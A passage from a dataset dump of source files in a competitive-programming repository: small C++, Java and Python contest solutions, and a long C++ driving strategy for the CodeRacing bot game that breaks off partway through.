15.600000381469727, "blob_id": "21110d22193539b8f376507ed535ab834d2866f7", "content_id": "c2ead54a93838afb68b35ad8007d2626814f9103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 249, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/CodeForce/0316/lol.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nint main()\n{\n float x = 
0;\n int n = 0;\n std::cout.precision(8);\n while (true)\n {\n n++;\n x += 1.0 / n;\n if (n % 100000 == 0)\n std::cout << x << \"\\n\" << \"n == \" << n << \"\\n\";\n }\n}\n" }, { "alpha_fraction": 0.32382506132125854, "alphanum_fraction": 0.33224666118621826, "avg_line_length": 22.754838943481445, "blob_id": "81a192363660902b51d721cbfcb91a6e515079d9", "content_id": "8a81216e9155c4c98d76907c55feca781b7a133d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3681, "license_type": "no_license", "max_line_length": 78, "num_lines": 155, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class B {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = \"anc\";\n \n double q(int n, int k) {\n double ans = 0;\n \n int m = 100000;\n \n for (int i = 0; i < m; i++) {\n double w = Math.PI / m;\n double x = Math.PI * i / m;\n double h = Math.pow(Math.cos(x), n) * Math.cos((n - 2 * k) * x);\n ans += w * h;\n }\n \n return ans * (1 << n) / Math.PI;\n }\n \n public void solve() {\n int n = in.nextInt(), k = in.nextInt(), m = Math.max(n, k) + 1;\n \n long mod = 1L << in.nextInt();\n \n if (k > n) {\n out.println(0);\n return;\n }\n \n int[] s = new int[m];\n int[][] p = new int[m][16];\n int[][] e = new int[m][16];\n \n for (int i = 2; i < m; i++) {\n if (s[i] == 0) {\n \n long curP = i;\n int curE = 1;\n while (curP < m) {\n long d = 1;\n while (d * curP < m) {\n if (d % i != 0) {\n int j = (int) (d * curP);\n p[j][s[j]] = i;\n e[j][s[j]] = curE;\n ++s[j];\n }\n ++d;\n }\n \n ++curE;\n curP *= i;\n }\n }\n \n }\n \n int[] a = new int[m];\n \n for (int i = 2; i <= n; i++) {\n for (int j = 0; j < s[i]; j++) {\n a[p[i][j]] += e[i][j];\n }\n }\n \n for (int i = 2; i <= k; i++) {\n for (int j = 0; j < s[i]; j++) {\n a[p[i][j]] -= e[i][j];\n }\n }\n \n for (int i = 2; i <= (n - k); i++) {\n for 
(int j = 0; j < s[i]; j++) {\n a[p[i][j]] -= e[i][j];\n }\n }\n \n long ans = 1 % mod;\n for (int i = 0; i < m; i++) {\n while (a[i] > 0) {\n ans = (ans * i) % mod;\n --a[i];\n }\n \n }\n \n out.println(ans);\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new B().run();\n }\n}" }, { "alpha_fraction": 0.589595377445221, "alphanum_fraction": 0.6069363951683044, "avg_line_length": 20.625, "blob_id": "ed5f6d9bfc55f2c17a0b13e23b34b7b50a07fe79", "content_id": "3d885acbf942c2ab35e029f0565bc259772479c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/2015/yaQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "strings = input().split()\ninput()\ncorr = input().split()\ncount = 0\nfor s in strings:\n if not s in corr:\n count += 1\nprint(\"Correct\" if count == 0 else \"Misspell\")\n" }, { "alpha_fraction": 0.3969394266605377, 
"alphanum_fraction": 0.4266846179962158, "avg_line_length": 29.82023811340332, "blob_id": "63fb62211dcc1dd395619918841c3c31acc0e86f", "content_id": "17aa77ff867db44cc8205674ddcfaf6dc48547ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 26886, "license_type": "no_license", "max_line_length": 275, "num_lines": 840, "path": "/trains/ai/cpp-cgdk/38.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\r\n\r\n#define PI 3.14159265358979323846\r\n#define _USE_MATH_DEFINES\r\n#define go(p, a, b) { if (p) goto a; else goto b; }\r\n\r\n#include <bits/stdc++.h>\r\n//#ifdef ONLINE_JUDGE\r\n//#define debug 1\r\n//#endif\r\n#ifdef debug\r\n#undef debug\r\n#endif\r\n//#include \"library.h\"\r\n//#endif\r\n\r\nusing namespace model;\r\nusing namespace std;\r\n\r\ndouble DIST_TO_NEXT = 750;\r\nint COUNT_OF_FAILS = 90;\r\nint FORCE_BACK = 130;\r\nint FORCE_RIGHT = 60;\r\nint FORCE = 100;\r\nint BREAK = 30;\r\ndouble MAX_SPEED = 17;\r\nint FORCE_SLOW_DOWN = 1;\r\nint GLOBAL_FAIL = 2;\r\ndouble ANGLE_THROW = PI / 30;\r\n\r\nbool changed = false;\r\ndouble eps = 5;\r\ndouble power = 0.85;\r\ndouble distToNext = -10000, prevDistance;\r\nint countOfFails = 0;\r\nint forceBack = 0;\r\nint forceRight = 0;\r\nint force = 0;\r\nint prevx = 0;\r\nint currx = -1234;\r\nint forceSlow = 0;\r\nint globalFail = 0;\r\ndouble turn = 0.0;\r\ndouble tileSize = 0.0;\r\nint dir[15][4];\r\nvector<vector<TileType>> TEMP;\r\nbool init = true;\r\nbool snake = false;\r\nbool drift = false;\r\ndouble width;\r\ndouble height;\r\nint d = 0;\r\nint pd = 0;\r\nset<pair<int, int>> bad;\r\nvector<pair<int, int>> old;\r\n\r\n#define RIGHT 0\r\n#define UP 1\r\n#define LEFT 2\r\n#define DOWN 3\r\n\r\nvector<int> ddx = {1, 0, -1, 0};\r\nvector<int> ddy = {0, -1, 0, 1};\r\nmap<pair<int, int>, int> directions;\r\n\r\nvector<vector<vector<int>>> FUUUUU = {\r\n/*0 сначала шли вправо*/\r\n {\r\n //->\r\n {\r\n RIGHT, UP, 
DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, RIGHT, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, RIGHT, LEFT, UP\r\n }\r\n },\r\n/*1 сначала шли вверх*/ \r\n {\r\n //->\r\n {\r\n RIGHT, UP, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, LEFT, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, LEFT, RIGHT, UP\r\n }\r\n },\r\n/*2 сначала шли влево*/ \r\n {\r\n //->\r\n {\r\n RIGHT, UP, DOWN, LEFT\r\n },\r\n //^\r\n {\r\n UP, LEFT, RIGHT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, UP, DOWN, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, LEFT, RIGHT, UP\r\n }\r\n },\r\n/*3 сначала шли вниз*/ \r\n {\r\n //->\r\n {\r\n RIGHT, DOWN, UP, LEFT\r\n },\r\n //^\r\n {\r\n UP, RIGHT, LEFT, DOWN\r\n },\r\n //<-\r\n {\r\n LEFT, DOWN, UP, RIGHT\r\n },\r\n //V\r\n {\r\n DOWN, RIGHT, LEFT, UP\r\n }\r\n }\r\n};\r\n\r\nstruct vertex\r\n{\r\n int x, y, d, pd; \r\n vertex(){} \r\n vertex(int x, int y, int pd, int d) : x(x), y(y), d(d), pd(pd) {}\r\n};\r\n\r\ntemplate <typename T>\r\nvoid ppp(vector<vector<T>> a)\r\n{\r\n int n = a.size();\r\n int m = a[0].size();\r\n for (int j = 0; j < m; ++j)\r\n for (int i = 0; i < n; ++i)\r\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\r\n}\r\n\r\nbool isCorner(TileType a) \r\n{\r\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\r\n}\r\n\r\ndouble getCenter(double xxx)\r\n{\r\n return (xxx + 0.5) * tileSize;\r\n}\r\n\r\ndouble get(double xxx)\r\n{\r\n return xxx * tileSize;\r\n}\r\n\r\ndouble get34(double xxx)\r\n{\r\n return (xxx + 0.75) * tileSize;\r\n}\r\n\r\ndouble get14(double xxx)\r\n{\r\n return (xxx + 0.25) * tileSize;\r\n}\r\n\r\nbool isVertical(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.first == b.first;\r\n}\r\n\r\nbool isHorizontal(pair<int, int> a, pair<int, int> b)\r\n{\r\n return a.second == b.second;\r\n}\r\n\r\nbool is32(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n 
isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]))\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is3_2(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isVertical(a[1], a[4]) &&\r\n isHorizontal(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isHorizontal(a[1], a[4]) &&\r\n isVertical(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is212(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return\r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4]) &&\r\n isHorizontal(a[1], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4]) &&\r\n isVertical(a[1], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\nbool is41(vector<pair<int, int>>& a)\r\n{\r\n if (a.size() >= 5)\r\n return \r\n (\r\n isHorizontal(a[0], a[1]) &&\r\n isHorizontal(a[1], a[2]) &&\r\n isHorizontal(a[2], a[3]) &&\r\n isVertical(a[3], a[4])\r\n )\r\n ||\r\n (\r\n isVertical(a[0], a[1]) &&\r\n isVertical(a[1], a[2]) &&\r\n isVertical(a[2], a[3]) &&\r\n isHorizontal(a[3], a[4])\r\n );\r\n else\r\n return false;\r\n}\r\n\r\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\r\n else\r\n return make_pair(get(max(a.first, b.first)), getCenter(a.second));\r\n}\r\n\r\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b)\r\n{\r\n if (isVertical(a, b))\r\n return make_pair(get14(a.first), a.second > b.second ? 
get14(a.second) : get34(a.second));\r\n else\r\n return make_pair(get14(a.first), get14(a.second));\r\n}\r\n\r\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\r\n int countOfMyCars = 0;\r\n for (auto car : world.getCars())\r\n countOfMyCars += car.isTeammate();\r\n if (countOfMyCars == 2)\r\n return;\r\n if (init)\r\n {\r\n init = false;\r\n ppp(world.getTilesXY());\r\n TEMP = world.getTilesXY();\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n pd = d;\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n if (old.size())\r\n {\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n }\r\n old.push_back({qx, qy});\r\n\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n wp.push_back(wp[0]);\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int fi, fj, pi, pj;\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex 
+ 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n if (bad.find({si, sj}) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int ti, int tj, int pd, int dd)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\");\r\n#endif\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n while (q.size())\r\n {\r\n int u = q.front().x;\r\n int v = q.front().y;\r\n int prevD = q.front().d;\r\n int prevprevD = q.front().pd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n if (u == ti && v == tj)\r\n {\r\n vector<pair<int, int>> path;\r\n pair<int, int> start = {si, sj};\r\n while (u != start.first || v != start.second)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back(start);\r\n reverse(path.begin(), path.end());\r\n return path;\r\n }\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n if (d[u + dx[i]][v + dy[i]] == 10000)\r\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\r\n prev[u + dx[i]][v + dy[i]] = {u, v},\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path = getPath(si, sj, ti, tj, pd, d);\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n int t = 0;\r\n int y = 0;\r\n auto 
zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n zxcv = path[path.size() - 2],\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n path.pop_back();\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y);\r\n if (temp.size() == 0)\r\n break;\r\n for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n writeln();\r\n writeln(xxx);\r\n writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = path[3];\r\n snake = true;\r\n\r\n // cd\r\n //ab\r\n if ((ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 
== dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj))\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 
2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = 0.3;\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[i - 1].first;\r\n pj = path[i - 1].second;\r\n fi = path[i + 1].first;\r\n fj = path[i + 1].second;\r\n break;\r\n }\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n //else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (TEMP[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\nlt:\r\n TEMP[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\nrt:\r\n TEMP[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\nlb:\r\n TEMP[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\nrb:\r\n TEMP[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\nth:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\nbh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n 
go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n //ppp(TEMP);\r\n //cout << \"\\n\";\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36))\r\n {\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - width - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + width + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n //if (is32(path) && path.size() >= 4)\r\n //tie(nextWaypointX, nextWaypointY) = getCorner(path[2], path[3]);\r\n //cout << targetX << \" \" << targetY << \"\\n\";\r\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n double speedModule = hypot(self.getSpeedX(), 
self.getSpeedY());\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (!forceBack && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 
1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n if (forceSlow)\r\n forceSlow--;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.72;\r\n //if (is3_2(path))\r\n //dd *= 1.6;\r\n if (is212(path))\r\n dd *= 2;\r\n if (is41(path))\r\n dd *= 1.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find({si, sj}) == bad.end()) || forceSlow || (bad.find({si, sj}) != bad.end() && speedModule > 8))\r\n move.setBrake(true);\r\n power = 1.0;\r\n }\r\n }\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]))\r\n //if (self.getAngleTo(car) + ANGLE_THROW * 3 > PI || self.getAngleTo(car) - ANGLE_THROW * 3 < -PI)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n if (self.getRemainingOiledTicks() > 0)\r\n forceSlow = 0;\r\n if (world.getTick() > 210 && (distToNext > tileSize * 5 || snake) && world.getTick() >= 300)\r\n move.setUseNitro(true);\r\n 
